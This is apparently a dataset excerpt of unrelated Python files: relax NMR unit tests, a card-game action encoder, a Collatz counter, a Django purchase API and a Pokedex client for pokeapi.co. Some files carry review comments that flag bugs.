        """Test the proper operation of the molecule loop when no data is present.

        The function tested is pipe_control.mol_res_spin.molecule_loop().
        """
        # Reset relax.
        reset()
        # Add a data pipe to the data store.
        ds.add(pipe_name='orig', pipe_type='mf')
        # Loop over the molecules.
        i = 0
        for molecule in mol_res_spin.molecule_loop():
            i = i + 1
        # Test loop length.
        self.assertEqual(i, 0)

    def test_molecule_loop_no_pipe(self):
        """Test the proper operation of the molecule loop when no data pipe is present.

        The function tested is pipe_control.mol_res_spin.molecule_loop().
        """
        # Reset relax.
        reset()
        # Function for the problem of catching an error in a generator function.
        def fail_test():
            for molecule in mol_res_spin.molecule_loop():
                pass
        # Test for the no pipe error.
        self.assertRaises(RelaxNoPipeError, fail_test)

    def test_molecule_loop_no_selection(self):
        """Test the proper operation of the molecule loop when no selection is present.

        The function tested is pipe_control.mol_res_spin.molecule_loop().
        """
        # Molecule data.
        name = ['Ap4Aase', 'RNA']
        # Loop over the molecules.
        i = 0
        for mol in mol_res_spin.molecule_loop():
            # Test the molecule names.
            self.assertEqual(mol.name, name[i])
            # Increment i.
            i = i + 1
        # Test loop length.
        self.assertEqual(len(list(mol_res_spin.molecule_loop())), 2)

    def test_residue_loop(self):
        """Test the proper operation of the residue loop with residue selection.

        The function tested is pipe_control.mol_res_spin.residue_loop().
        """
        # Loop over the residues.
        for res in mol_res_spin.residue_loop('#Ap4Aase:Glu'):
            # Test the selection.
            self.assertEqual(res.num, 2)
        # Test loop length.
        self.assertEqual(len(list(mol_res_spin.residue_loop('#Ap4Aase:Glu'))), 1)

    def test_residue_loop_no_data(self):
        """Test the proper operation of the residue loop when no data is present.

        The function tested is pipe_control.mol_res_spin.residue_loop().
        """
        # Reset relax.
        reset()
        # Add a data pipe to the data store.
        ds.add(pipe_name='orig', pipe_type='mf')
        # Loop over the residues.
        i = 0
        for residue in mol_res_spin.residue_loop():
            i = i + 1
        # Test loop length.
        self.assertEqual(i, 0)

    def test_residue_loop_no_pipe(self):
        """Test the proper operation of the residue loop when no data pipe is present.

        The function tested is pipe_control.mol_res_spin.residue_loop().
        """
        # Reset relax.
        reset()
        # Function for the problem of catching an error in a generator function.
        def fail_test():
            for residue in mol_res_spin.residue_loop():
                pass
        # Test for the no pipe error.
        self.assertRaises(RelaxNoPipeError, fail_test)

    def test_residue_loop_no_selection(self):
        """Test the proper operation of the residue loop when no selection is present.

        The function tested is pipe_control.mol_res_spin.residue_loop().
        """
        # Spin data.
        num = [1, 2, 4, -5, -4]
        name = [None, 'Glu', 'Pro', None, None]
        # Loop over the residues.
        i = 0
        for res in mol_res_spin.residue_loop():
            # Test the residue numbers.
            self.assertEqual(res.num, num[i])
            # Test the residue names.
            self.assertEqual(res.name, name[i])
            # Increment i.
            i = i + 1
        # Test loop length.
        self.assertEqual(i, 5)

    def test_return_molecule(self):
        """Test the function for returning the desired molecule data container.

        The function tested is pipe_control.mol_res_spin.return_molecule().
        """
        # Ask for a few molecules.
        mol1 = mol_res_spin.return_molecule('#Ap4Aase')
        mol2 = mol_res_spin.return_molecule(selection='#RNA', pipe='orig')
        # Test the data of molecule 1.
        self.assertEqual(mol1.name, 'Ap4Aase')
        # Test the data of molecule 2.
        self.assertEqual(mol2.name, 'RNA')

    def test_return_molecule_pipe_fail(self):
        """Test the failure of the function for returning the desired molecule data container.

        The function tested is pipe_control.mol_res_spin.return_molecule().
        """
        # Try to get a molecule from a missing data pipe.
        self.assertRaises(RelaxNoPipeError, mol_res_spin.return_molecule, selection='#Ap4Aase', pipe='new')
        self.assertRaises(RelaxNoPipeError, mol_res_spin.return_molecule, selection='#RNA', pipe='new')

    def test_return_residue(self):
        """Test the function for returning the desired residue data container.

        The function tested is pipe_control.mol_res_spin.return_residue().
        """
        # Ask for a few residues.
        res1 = mol_res_spin.return_residue(':1')
        res2 = mol_res_spin.return_residue(selection=':2')
        res4 = mol_res_spin.return_residue(selection=':4', pipe='orig')
        res5 = mol_res_spin.return_residue(selection='#RNA:-5', pipe='orig')
        # Test the data of residue 1.
        self.assertEqual(res1.num, 1)
        self.assertEqual(res1.name, None)
        # Test the data of residue 2.
        self.assertEqual(res2.num, 2)
        self.assertEqual(res2.name, 'Glu')
        # Test the data of residue 4.
        self.assertEqual(res4.num, 4)
        self.assertEqual(res4.name, 'Pro')
        # Test the data of the RNA residue -5.
        self.assertEqual(res5.num, -5)
        self.assertEqual(res5.name, None)
        self.assertEqual(res5.spin[1].name, 'N5')

    def test_return_residue_pipe_fail(self):
        """Test the failure of the function for returning the desired residue data container.

        The function tested is pipe_control.mol_res_spin.return_residue().
        """
        # Try to get a residue from a missing data pipe.
        self.assertRaises(RelaxNoPipeError, mol_res_spin.return_residue, selection=':2', pipe='new')

    def test_return_single_residue_info(self):
        """Test the function for returning the desired residue data container.

        The function tested is pipe_control.mol_res_spin.return_single_residue_info().
        """
        # Ask for a few residues.
        res1 = mol_res_spin.return_single_residue_info('1')
        res2 = mol_res_spin.return_single_residue_info('2,Glu')
        res4 = mol_res_spin.return_single_residue_info('Pro,4')
        res5 = mol_res_spin.return_single_residue_info('-5')
        # Test the data of residue 1.
        self.assertEqual(res1, (1, None))
        # Test the data of residue 2.
        self.assertEqual(res2, (2, 'Glu'))
        # Test the data of residue 4.
        self.assertEqual(res4, (4, 'Pro'))
        # Test the data of the RNA residue -5.
        self.assertEqual(res5, (-5, None))

    def test_return_single_residue_info_fail(self):
        """Test the failure of the function for returning the desired residue data container.

        The function tested is pipe_control.mol_res_spin.return_single_residue_info().
        """
        # Ask for a few residues.
        self.assertRaises(RelaxError, mol_res_spin.return_single_residue_info, '1,2')
        self.assertRaises(RelaxError, mol_res_spin.return_single_residue_info, '1,Glu,Pro')
        self.assertRaises(RelaxError, mol_res_spin.return_single_residue_info, '1,2,Glu,Pro')

    def test_return_spin(self):
        """Test the function for returning the desired spin data container.

        The function tested is pipe_control.mol_res_spin.return_spin().
        """
        # Ask for a few spins.
        spin1 = mol_res_spin.return_spin('#Ap4Aase:1')
        spin2 = mol_res_spin.return_spin(spin_id='#Ap4Aase:2')
        spin3 = mol_res_spin.return_spin(spin_id='#Ap4Aase:4', pipe='orig')
        spin4 = mol_res_spin.return_spin(spin_id='#RNA:-5@N5', pipe='orig')
        spin5 = mol_res_spin.return_spin(spin_id='#RNA:-4@2H', pipe='orig')
        # Test the data of spin 1.
        self.assertNotEqual(spin1, None)
        self.assertEqual(spin1.num, 60)
        self.assertEqual(spin1.name, 'NH')
        # Test the data of spin 2.
        self.assertNotEqual(spin2, None)
        self.assertEqual(spin2.num, 63)
        self.assertEqual(spin2.name, 'NH')
        # Test the data of spin 3.
        self.assertNotEqual(spin3, None)
        self.assertEqual(spin3.num, None)
        self.assertEqual(spin3.name, None)
        # Test the data of the RNA res -5, spin N5.
        self.assertNotEqual(spin4, None)
        self.assertEqual(spin4.num, None)
        self.assertEqual(spin4.name, 'N5')
        # Test the data of the RNA res -4, spin 2H.
        self.assertNotEqual(spin5, None)
        self.assertEqual(spin5.num, 132)
        self.assertEqual(spin5.name, '2H')

    def test_return_spin_pipe_fail(self):
        """Test the failure of the function for returning the desired spin data container.

        The function tested is pipe_control.mol_res_spin.return_spin().
        """
        # Try to get a spin from a missing data pipe.
        self.assertRaises(RelaxNoPipeError, mol_res_spin.return_spin, spin_id=':2', pipe='new')

    def test_spin_loop(self):
        """Test the proper operation of the spin loop with spin selection.

        The function tested is pipe_control.mol_res_spin.spin_loop().
        """
        # Spin data.
        select = [1, 0]
        # Loop over the spins.
        i = 0
        for spin in mol_res_spin.spin_loop('@N5'):
            # Test the selection.
            self.assertEqual(spin.select, select[i])
            # Test the spin names.
            self.assertEqual(spin.name, 'N5')
            # Increment i.
            i = i + 1
        # Test loop length.
        self.assertEqual(i, 2)

    def test_spin_loop_boolean_or(self):
        """Test the operation of the spin loop with the selection "#Ap4Aase:Glu | #RNA@C8".

        The function tested is pipe_control.mol_res_spin.spin_loop().
        """
        # Selection, and spin name and number.
        select = [1, 0, 1]
        name = ['NH', 'C8', 'C8']
        num = [63, None, None]
        # Loop over the spins.
        i = 0
        for spin in mol_res_spin.spin_loop("#Ap4Aase:Glu | #RNA@C8"):
            # Test the spin.
            self.assertEqual([spin.select, spin.name, spin.num], [select[i], name[i], num[i]])
            # Increment i.
            i = i + 1
        # Test loop length.
        self.assertEqual(i, 3)

    def test_spin_loop_multiatom(self):
        """Test the proper operation of the spin loop with spin selection '@NH|@N5'.

        The function tested is pipe_control.mol_res_spin.spin_loop().
        """
        # Spin data.
        select = [0, 1, 1, 0]
        name = ['NH', 'NH', 'N5', 'N5']
        # Loop over the spins.
        i = 0
        for spin in mol_res_spin.spin_loop('@NH|@N5'):
            # Test the selection.
            self.assertEqual(spin.select, select[i])
            # Test the spin names.
            self.assertEqual(spin.name, name[i])
            # Increment i.
            i = i + 1
        # Test loop length.
        self.assertEqual(i, 4)

    def test_spin_loop_no_data(self):
        """Test the proper operation of the spin loop when no data is present.

        The function tested is pipe_control.mol_res_spin.spin_loop().
        """
        # Reset relax.
        reset()
        # Add a data pipe to the data store.
        ds.add(pipe_name='orig', pipe_type='mf')
        # Loop over the spins.
        i = 0
        for spin in mol_res_spin.spin_loop():
            i = i + 1
        # Test loop length.
        self.assertEqual(i, 0)

    def test_spin_loop_no_pipe(self):
        """Test the proper operation of the spin loop when no data pipe is present.

        The function tested is pipe_control.mol_res_spin.spin_loop().
        """
        # Reset relax.
        reset()
        # Function for the problem of catching an error in a generator function.
        def fail_test():
            for spin in mol_res_spin.spin_loop():
                pass
        # Test for the no pipe error.
        self.assertRaises(RelaxNoPipeError, fail_test)

    def test_spin_loop_no_selection(self):
        """Test the proper operation of the spin loop when no selection is present.

        The function tested is pipe_control.mol_res_spin.spin_loop().
        """
        # Spin data.
        select = [0, 1, 0, 0, 1, 1, 0, 1]
        name = ['NH', 'NH', None, 'C8', 'N5', 'C8', 'N5', '2H']
        # Loop over the spins.
        i = 0
        for spin in mol_res_spin.spin_loop():
            # Test the selection.
            self.assertEqual(spin.select, select[i])
            # Test the spin names.
            self.assertEqual(spin.name, name[i])
            # Increment i.
            i = i + 1
        # Test loop length.
        self.assertEqual(i, 8)

    def test_spin_loop_single_spin(self):
        """Test the operation of the spin loop with the single spin selection '#Ap4Aase:Glu@63'.

        The function tested is pipe_control.mol_res_spin.spin_loop().
        """
        # Loop over the spins.
        i = 0
        for spin in mol_res_spin.spin_loop('#Ap4Aase:Glu@63'):
            # Test the selection.
            self.assertEqual(spin.select, 1)
            # Test the spin name.
            self.assertEqual(spin.name, 'NH')
            # Test the spin number.
            self.assertEqual(spin.num, 63)
            # Increment i.
            i = i + 1
        # Test loop length.
        self.assertEqual(i, 1)

    def test_spin_loop_wildcard(self):
        """Test the proper operation of the spin loop with wildcard spin selection '@N*'.

        The function tested is pipe_control.mol_res_spin.spin_loop().
        """
        # Spin data.
        select = [0, 1, 1, 0]
        name = ['NH', 'NH', 'N5', 'N5']
        # Loop over the spins.
        i = 0
        for spin in mol_res_spin.spin_loop('@N*'):
            # Test the selection.
            self.assertEqual(spin.select, select[i])
            # Test the spin names.
            self.assertEqual(spin.name, name[i])
            # Increment i.
            i = i + 1
        # Test loop length.
        self.assertEqual(i, 4)

    def test_boolean_and_selection(self):
        """Test boolean and in mol-res-spin selections."""
        # The selection loop:
        sel = list(mol_res_spin.residue_loop("#Ap4Aase:4 & :Pro"))
        # Test:
        self.assertEqual(len(sel), 1)
        for res in sel:
            self.assertTrue(res.name == "Pro" and res.num == 4)

    def test_boolean_complex_selection(self):
        """Test complex boolean mol-res-spin selections."""
        # The residue selection loop.
        sel = list(mol_res_spin.residue_loop("#Ap4Aase:4 & :Pro | #RNA"))
        # Residue names and numbers.
        names = ['Pro', None, None]
        numbers = [4, -5, -4]
        # The residues.
        self.assertEqual(len(sel), 3)
        for i in range(3):
            self.assertEqual(sel[i].name, names[i])
            self.assertEqual(sel[i].num, numbers[i])

    ######################################################
    # Test disabled until this functionality is enabled. #
    ######################################################
    def fixme_test_boolean_parenthesis_selection(self):
        """Test complex boolean mol-res-spin selections with parenthesis."""
        # The selection loop:
        sel = list(mol_res_spin.residue_loop("(#Ap4Aase & :Pro) | (#RNA & :-4)"))
        # Test:
        self.assertEqual(len(sel), 2)
        for res in sel:
            self.assertTrue(res.num in [-4, 4])
|
import numpy as np
from Cards import Card
# Card combination: Use for action decoding
suits = ["Clubs", "Diamonds", "Hearts", "Spades"]
# All unordered suit pairs, each pair sorted alphabetically; their list index
# is used to encode/decode "double" discard actions.
double_combination = [["Clubs", "Diamonds"], ["Clubs", "Hearts"], ["Clubs", "Spades"], ["Diamonds", "Hearts"],
                      ["Diamonds", "Spades"], ["Hearts", "Spades"]]
# All unordered suit triples, each sorted alphabetically; their list index is
# used to encode/decode "triple" discard actions.
triple_combination = [["Clubs", "Diamonds", "Hearts"], ["Clubs", "Diamonds", "Spades"], ["Clubs", "Hearts", "Spades"],
                      ["Diamonds", "Hearts", "Spades"]]
# Initialize the one-hot dictionary for cards.
# Maps a card string "<value>-<suit>" to its slot (0-51) in the 54-slot
# one-hot plane used by encode_cards(); the two jokers ('01' and '02')
# take the final slots 52 and 53.
card_encoding_dict = {}
num = 0
for s in suits:
    for v in ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13']:
        card = v+"-"+s
        card_encoding_dict[card] = num
        num += 1
# encode the two jokers
card_encoding_dict['01'] = num
num += 1
card_encoding_dict['02'] = num
def encode_cards(cards_str):
    """Encode a list of card strings into a 54-slot one-hot plane.

    Slots 0-51 are the regular cards (via card_encoding_dict); the first
    '0' (joker) seen maps to slot '01', every subsequent '0' to slot '02'.
    """
    plane = np.zeros(54, dtype=int)
    seen_first_joker = False
    for name in cards_str:
        if name == '0':
            # Jokers share the string '0'; distinguish the first occurrence
            # from any later ones.
            key = '01' if not seen_first_joker else '02'
            seen_first_joker = True
        else:
            key = name
        plane[card_encoding_dict[key]] = 1
    return plane
def cards_to_str(cards):
    """Convert a list of card objects into their string representations."""
    return [card.get_str() for card in cards]
def encode_action_discard(play_list):
    """ Return action id of the action from the player
    returned action id is an integer ranging from 0 to 347

    Action id layout (inverse of decode_action_discard):
      0       : empty play (discard nothing)
      1-52    : single, 53-130 : double, 131-182 : triple, 183-195 : quadruple
      196-239 : straight of 3, 240-279 : straight of 4,
      280-315 : straight of 5, 316-347 : straight of 6
    """
    action_id_list = []
    for play in play_list:
        # encode the cards in plays into individual action id
        if len(play) == 0:
            # Empty play encodes as 0.
            action_id_list.append(0)
            continue
        # True when every card in the play has the same face value
        # (distinguishes doubles/triples from 2- and 3-card straights).
        cards_have_same_value = True
        for c in play:
            if c.value != play[0].value:
                cards_have_same_value = False
        action = 0
        if len(play) == 1:
            # single
            if play[0].suit != '':
                # remove the option of discarding the Joker
                # (a Joker has an empty suit string and stays at action 0)
                suit_num = suits.index(play[0].suit)
                action = suit_num * 13 + play[0].value - 1
                # NOTE(review): the source dump lost indentation here; the
                # offset is applied only on the non-Joker path so that a
                # Joker single does not collide with a real card id — confirm
                # against the original repository.
                action += 1
        elif len(play) == 2 and cards_have_same_value:
            # double
            if play[0].suit != '':
                # remove the option of discarding the Joker
                suits_temp = [play[0].suit, play[1].suit]
                suits_temp.sort()
                suit_num = double_combination.index(suits_temp)
                action = suit_num * 13 + play[0].value - 1
                # NOTE(review): same indentation caveat as the single case.
                action += 53
        elif len(play) == 3 and cards_have_same_value:
            # triple
            suits_temp = [play[0].suit, play[1].suit, play[2].suit]
            suits_temp.sort()
            suit_num = triple_combination.index(suits_temp)
            action = suit_num * 13 + play[0].value - 1
            action += 131
        elif len(play) == 4 and cards_have_same_value:
            # quadruple (suit set is unique, so only the rank is encoded)
            action = play[0].value - 1
            action += 183
        elif len(play) == 3:
            # straight of 3 (11 possible starting ranks per suit)
            suit_num = suits.index(play[0].suit)
            action = suit_num * 11 + play[0].value - 1
            action += 196
        elif len(play) == 4:
            # straight of 4 (10 possible starting ranks per suit)
            suit_num = suits.index(play[0].suit)
            action = suit_num * 10 + play[0].value - 1
            action += 240
        elif len(play) == 5:
            # straight of 5 (9 possible starting ranks per suit)
            suit_num = suits.index(play[0].suit)
            action = suit_num * 9 + play[0].value - 1
            action += 280
        elif len(play) == 6:
            # straight of 6 (8 possible starting ranks per suit)
            suit_num = suits.index(play[0].suit)
            action = suit_num * 8 + play[0].value - 1
            action += 316
        action_id_list.append(action)
    return action_id_list
def decode_action_discard(action):
    """ Return the cards to be discarded from the action

    Action is an integer ranging from 0 to 347.  Inverse of
    encode_action_discard().  The id space partitions as:
      0        : discard nothing (pass)
      1-52     : single        (13 ranks x 4 suits)
      53-130   : double        (13 ranks x 6 suit pairs)
      131-182  : triple        (13 ranks x 4 suit triples)
      183-195  : quadruple     (13 ranks)
      196-239  : straight of 3 (11 starting ranks x 4 suits)
      240-279  : straight of 4 (10 x 4)
      280-315  : straight of 5 (9 x 4)
      316-347  : straight of 6 (8 x 4)
    """
    # Bug fix: action 0 is the "discard nothing" action produced by
    # encode_action_discard() for an empty play.  Previously it fell into
    # the single-card branch (action -= 1 -> -1) and wrongly decoded to
    # the King of Clubs.
    if action == 0:
        return []
    discard = []
    # find the cards behind the action number
    # 52(single)+78(double)+52(triple)+13(quadruple)+44(staight3)+40(staight4)+36(staight5)+32(6)
    # card ranges from 1 to 13, suit ranges from CDHS
    if action <= 52:
        # single
        action -= 1
        rank = action % 13 + 1
        suit = suits[int(action/13)]
        discard = [Card(rank, suit)]
    elif action <= 130:
        # double
        action -= 53
        rank = action % 13 + 1
        suit1 = double_combination[int(action/13)][0]
        suit2 = double_combination[int(action/13)][1]
        discard = [Card(rank, suit1), Card(rank, suit2)]
    elif action <= 182:
        # triple
        action -= 131
        rank = action % 13 + 1
        suit1 = triple_combination[int(action/13)][0]
        suit2 = triple_combination[int(action/13)][1]
        suit3 = triple_combination[int(action/13)][2]
        discard = [Card(rank, suit1), Card(rank, suit2), Card(rank, suit3)]
    elif action <= 195:
        # quadruple
        action -= 183
        rank = action + 1
        discard = [Card(rank, "Clubs"), Card(rank, "Diamonds"), Card(rank, "Hearts"), Card(rank, "Spades")]
    elif action <= 239:
        # straight of 3
        action -= 196
        suit = suits[int(action/11)]
        rank = action % 11 + 1
        discard = [Card(rank, suit), Card(rank + 1, suit), Card(rank + 2, suit)]
    elif action <= 279:
        # straight of 4
        action -= 240
        suit = suits[int(action/10)]
        rank = action % 10 + 1
        discard = [Card(rank, suit), Card(rank + 1, suit), Card(rank + 2, suit), Card(rank + 3, suit)]
    elif action <= 315:
        # straight of 5
        action -= 280
        suit = suits[int(action/9)]
        rank = action % 9 + 1
        discard = [Card(rank, suit), Card(rank + 1, suit), Card(rank + 2, suit), Card(rank + 3, suit), Card(rank + 4, suit)]
    elif action <= 347:
        # straight of 6
        action -= 316
        suit = suits[int(action/8)]
        rank = action % 8 + 1
        discard = [Card(rank, suit), Card(rank + 1, suit), Card(rank + 2, suit), Card(rank + 3, suit), Card(rank + 4, suit), Card(rank + 5, suit)]
    return discard
""" Convert cards to string test """
# cards = [Card(12, "Clubs"), Card(0, ''), Card(0, ''), Card(2, 'Hearts')]
# cards_str_temp = cards_to_str(cards)
# print(cards_str_temp)
""" Encode Cards test """
# cards_encoding = encode_cards(cards_str_temp)
# print(cards_encoding)
""" General Encoding and Decoding Cards test """
# for suit in ["Clubs", "Diamonds", "Hearts", "Spades"]:
# for rank in [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]:
# cards = [Card(rank, suit)]
# cards_str_temp = cards_to_str(cards)
# cards_encoding = encode_cards(cards_str_temp)
# print(cards_encoding)
""" Decode action test """
# action_id = 185
# print(action_id)
# discard_cards = decode_action_discard(action_id)
# print(discard_cards)
""" Encode plays test """
# plays = [discard_cards]
# actions = encode_action_discard(plays)
# print(actions)
""" General Encoding and Decoding action test """
# for i in range(195):
# discard_cards = decode_action_discard(i)
# plays = [discard_cards]
# actions = encode_action_discard(plays)
# if i != actions[0]:
# print(i)
|
def collatz(n):
    """Return the number of Collatz iterations taken to get from n to 1.

    Repeatedly applies n -> 3n + 1 when n is odd and n -> n // 2 when n is
    even, counting steps until n reaches 1.

    Args:
        n: A positive integer starting value.

    Returns:
        The number of iterations performed (0 when n is already 1).

    Raises:
        ValueError: If n < 1 — the loop would never terminate for zero or
            negative inputs (0 -> 0 forever; negatives cycle below 1).
    """
    if n < 1:
        raise ValueError("n must be a positive integer")
    iterCount = 0
    while n != 1:
        if n & 1:  # odd
            n = 3 * n + 1
        else:      # even
            n //= 2
        iterCount += 1
    return iterCount
def main():
    """Read an integer from the user and print its Collatz step count."""
    entered = int(input("Enter: "))
    print("Operations to 1: ", collatz(entered))
# Run the interactive prompt only when executed as a script.
if __name__ == '__main__':
    main()
|
24,129 | 3154257b025bf60bccdcc9eff390ae51297ee7e7 | from django.utils import timezone
from rest_framework import decorators, exceptions, mixins, status, viewsets
from rest_framework.response import Response
from brus.liste.api.serializers import PersonSerializer, PurchaseSerializer
from brus.liste.models import Person, post_slack_notification, publish_mqtt_notification
from brus.settings import PRODUCT_LIST
def purchase(name, shopping_cart):
    """
    Charge *shopping_cart* to the Person named *name*.

    Returns a DRF 201 Response with the updated person, or raises NotFound
    when the person does not exist (or the name is ambiguous).
    """
    try:
        person = Person.objects.get(name=name)
        if person.balance < 0:
            # Replay recent transactions backwards (newest first over the last
            # 3 days) to see whether the balance was non-negative at any point.
            current_balance = person.balance
            for txn in person.transactions.filter(
                date__gt=timezone.now() - timezone.timedelta(days=3)
            ).reverse():
                current_balance -= txn.value
                if current_balance >= 0:
                    break
            # If user has not had a positive balance in 3 days return err
            if current_balance < 0:
                publish_mqtt_notification(person, success=False)
                post_slack_notification(person, success=False)
                # NOTE(review): despite the comment above, nothing is returned
                # or raised here -- control falls through and the purchase is
                # still processed. Confirm whether an error Response is missing.
        for cart_item in shopping_cart:
            product_price = PRODUCT_LIST[cart_item["product_name"]]["current_price"]
            person.withdraw_money(product_price, count=cart_item["count"])
        result_serializer = PersonSerializer(person)
        return Response(result_serializer.data, status=status.HTTP_201_CREATED)
    except (Person.DoesNotExist, Person.MultipleObjectsReturned):
        raise exceptions.NotFound
class ListeViewSet(
    mixins.ListModelMixin, mixins.RetrieveModelMixin, viewsets.GenericViewSet
):
    """Read-only person listing plus product catalogue and purchase endpoints."""

    queryset = Person.objects.all()
    serializer_class = PersonSerializer
    lookup_field = "name"
    # Allow word characters and whitespace in the name URL fragment.
    # Fixed: the original pattern r"[/w/s]+" used forward slashes, so it only
    # matched the literal characters '/', 'w' and 's' instead of \w / \s.
    # NOTE(review): DRF routers read `lookup_value_regex`; confirm this
    # attribute name is actually honoured by the router in use.
    lookup_url_regex = r"[\w\s]+"

    @decorators.list_route()
    def products(self, request):
        """Return the configured product catalogue."""
        return Response(PRODUCT_LIST.values())

    @decorators.list_route(methods=["POST"], serializer_class=PurchaseSerializer)
    def purchase(self, request):
        """Validate the posted cart and delegate to the module-level purchase()."""
        serializer = self.get_serializer(data=request.data)
        serializer.is_valid(raise_exception=True)
        name = serializer.validated_data["name"]
        shopping_cart = serializer.validated_data["shopping_cart"]
        # TODO: add mqtt publish fail if user does not exist
        for cart_item in shopping_cart:
            # Reject unknown products before touching the account.
            if cart_item["product_name"] not in PRODUCT_LIST:
                return Response(
                    {"product_name": "not_found", "value": cart_item["product_name"]},
                    status=status.HTTP_404_NOT_FOUND,
                )
        return purchase(name, shopping_cart=shopping_cart)
|
24,130 | bb31dea2944f2bbaf0073fbfc37c2812f21bf250 | #!/usr/bin/env python3
import http.client, urllib.request, urllib.parse
import json
import ast
from image_handler import PokemonDisplay
class Pokedex:
    """
    Command-line Pokedex backed by pokeapi.co (v1 API).

    Caches a name -> national-dex-number map in `all_pkmn_dict` and exposes
    lookup and formatting helpers for individual Pokemon.
    """

    api_main = 'pokeapi.co'
    path = '/api/v1/'
    resource1 = 'pokedex'
    resource2 = '1'
    # Cache: pokemon name (lowercase) -> dex number (string).
    # NOTE: class-level mutable, so the cache is shared by all instances.
    all_pkmn_dict = {}

    def set_all_pkmn_dict(self):
        """Populate all_pkmn_dict from the full pokedex listing."""
        data_dict = self.get_dict_from_api(self.api_main, self.make_whole_path(self.resource1, self.resource2))
        for k in data_dict['pokemon']:
            pkmn_name = k['name']
            # Index 3 of the split resource URI is taken as the dex number --
            # TODO confirm against the API's URI format.
            pkmn_num = (k['resource_uri'].split('/'))[3]
            self.all_pkmn_dict[pkmn_name] = pkmn_num

    def get_dict_from_api(self, api_main, path):
        """GET *path* from *api_main* and parse the body into a dict.

        Raises Exception on any non-200 status.
        """
        conn = http.client.HTTPConnection(api_main)
        conn.request("GET", urllib.parse.quote(path))
        response = conn.getresponse()
        if response.status == 200:
            data = response.read()
            decoded_data = data.decode('latin1')
            # NOTE(review): the body is JSON; ast.literal_eval happens to work
            # for simple payloads but fails on true/false/null -- json.loads
            # would be the safer parser. Left as-is pending confirmation.
            return ast.literal_eval(decoded_data)
        else:
            raise Exception("HTTP call failed: " + response.reason)

    def see_all_pkmn(self):
        """Return (name, zero-padded number) tuples sorted by dex number."""
        all_pkmn = []
        for k, v in sorted(self.all_pkmn_dict.items()):
            if int(v) < 1000:
                v = v.zfill(3)
            all_pkmn.append((k, v))
        all_pkmn.sort(key=lambda pkmn: pkmn[1])
        return all_pkmn

    def get_html_from_site(self, site, path):
        """GET a raw page from *site*; return the body bytes or raise on non-200."""
        conn = http.client.HTTPConnection(site)
        conn.request("GET", urllib.parse.quote(path))
        response = conn.getresponse()
        if response.status == 200:
            data = response.read()
            return data
        else:
            raise Exception("HTTP call failed: " + response.reason + site + path)

    def make_html_path(self, move):
        """Build the serebii.net attackdex path for a move name."""
        # NOTE(review): these branches look inverted -- `!=` makes the first
        # branch handle every move EXCEPT will-o-wisp, and the final else is
        # unreachable. Probably `==` was intended; left as-is pending confirmation.
        if move.lower() != 'will-o-wisp':
            return '/attackdex-xy/' + move.replace('-', '').replace(' ', '').lower() + '.shtml'
        elif move.lower() != 'mud-slap':
            return '/attackdex-xy/' + move.replace(' ', '').lower() + '.shtml'
        else:
            print('/attackdex-xy/' + move.replace(' ', '').lower() + '.shtml')
            return '/attackdex-xy/' + move.replace(' ', '').lower() + '.shtml'

    def make_whole_path(self, first_resource, second_resource):
        """Join two resource names (lower-cased) onto the API base path."""
        first_part = first_resource.lower() + '/'
        second_part = second_resource.lower() + '/'
        return self.path + first_part + second_part

    def choose_pkmn(self):
        """Prompt the user for a Pokemon name and return it lower-cased."""
        pkmn_being_searched_for = input('''What is the name of the Pokemon you would like to search for?\n''').lower()
        return pkmn_being_searched_for

    def pkmn_in_dict(self, pkmn_being_searched_for):
        """True when the exact (case-insensitive) name is a known Pokemon."""
        return pkmn_being_searched_for.lower() in self.all_pkmn_dict

    def part_of_pkmn_name_in_dict(self, pkmn_being_searched_for):
        """True when the query is a substring of any known Pokemon name."""
        for k, v in self.all_pkmn_dict.items():
            if pkmn_being_searched_for.lower() in k:
                return True
        return False

    def get_pkmn_info(self, pkmn_being_searched_for):
        """Look up a Pokemon by name.

        Returns a one-element list with the full info tuple for an exact
        match, a list of (name, number) tuples for partial matches, or []
        when nothing matches.
        """
        if self.pkmn_in_dict(pkmn_being_searched_for):
            pkmn_name = pkmn_being_searched_for.upper()
            pkmn_id = self.get_pkmn_id(pkmn_being_searched_for)
            all_pkmn_info_dict = self.get_dict_from_api(self.api_main, self.make_whole_path('pokemon', self.all_pkmn_dict[pkmn_being_searched_for.lower()]))
            pkmn_types = self.get_pkmn_types(all_pkmn_info_dict['types'])
            pkmn_height = self.get_pkmn_height(all_pkmn_info_dict['height'])
            pkmn_weight = self.get_pkmn_weight(all_pkmn_info_dict['weight'])
            pkmn_base_hp = self.get_pkmn_hp(all_pkmn_info_dict['hp'])
            pkmn_base_atk = self.get_pkmn_atk(all_pkmn_info_dict['attack'])
            pkmn_base_def = self.get_pkmn_def(all_pkmn_info_dict['defense'])
            pkmn_base_sp_atk = self.get_pkmn_sp_atk(all_pkmn_info_dict['sp_atk'])
            pkmn_base_sp_def = self.get_pkmn_sp_def(all_pkmn_info_dict['sp_def'])
            pkmn_base_speed = self.get_pkmn_speed(all_pkmn_info_dict['speed'])
            pkmn_moves = self.get_moves(all_pkmn_info_dict['moves'])
            pkmn_generation_appearance = self.get_pkmn_generation(pkmn_id)
            return [(pkmn_name, pkmn_id, pkmn_types, pkmn_height, pkmn_weight, pkmn_base_hp, pkmn_base_atk, pkmn_base_def, pkmn_base_sp_atk, pkmn_base_sp_def, pkmn_base_speed, pkmn_moves, pkmn_generation_appearance)]
        elif self.part_of_pkmn_name_in_dict(pkmn_being_searched_for):
            pkmn_results_list_of_tuples = []
            for k, v in self.all_pkmn_dict.items():
                if pkmn_being_searched_for.lower() in k:
                    pkmn_results_list_of_tuples.append((k, v))
            return pkmn_results_list_of_tuples
        else:
            return []

    def get_pkmn_height(self, height_location):
        """Format the raw API height (value / 10) as metres."""
        height_formatted = int(height_location) / 10
        return 'Height: ' + str(height_formatted) + ' m'

    def get_pkmn_weight(self, weight_location):
        """Format the raw API weight (value / 10, mirroring get_pkmn_height) as kg."""
        weight_formatted = int(weight_location) / 10
        # Fixed: previously returned the raw value instead of the /10 result.
        return 'Weight: ' + str(weight_formatted) + ' kg'

    def get_pkmn_id(self, pkmn_being_searched_for):
        """Return the cached dex number (string) for an exact name."""
        return (self.all_pkmn_dict[pkmn_being_searched_for.lower()])

    def get_pkmn_types(self, list_of_types):
        """Render one or two type entries as a display string."""
        if len(list_of_types) == 1:
            return 'Type: ' + list_of_types[0]['name']
        else:
            return 'Types: ' + list_of_types[0]['name'] + ', ' + list_of_types[1]['name']

    def get_pkmn_hp(self, hp_location):
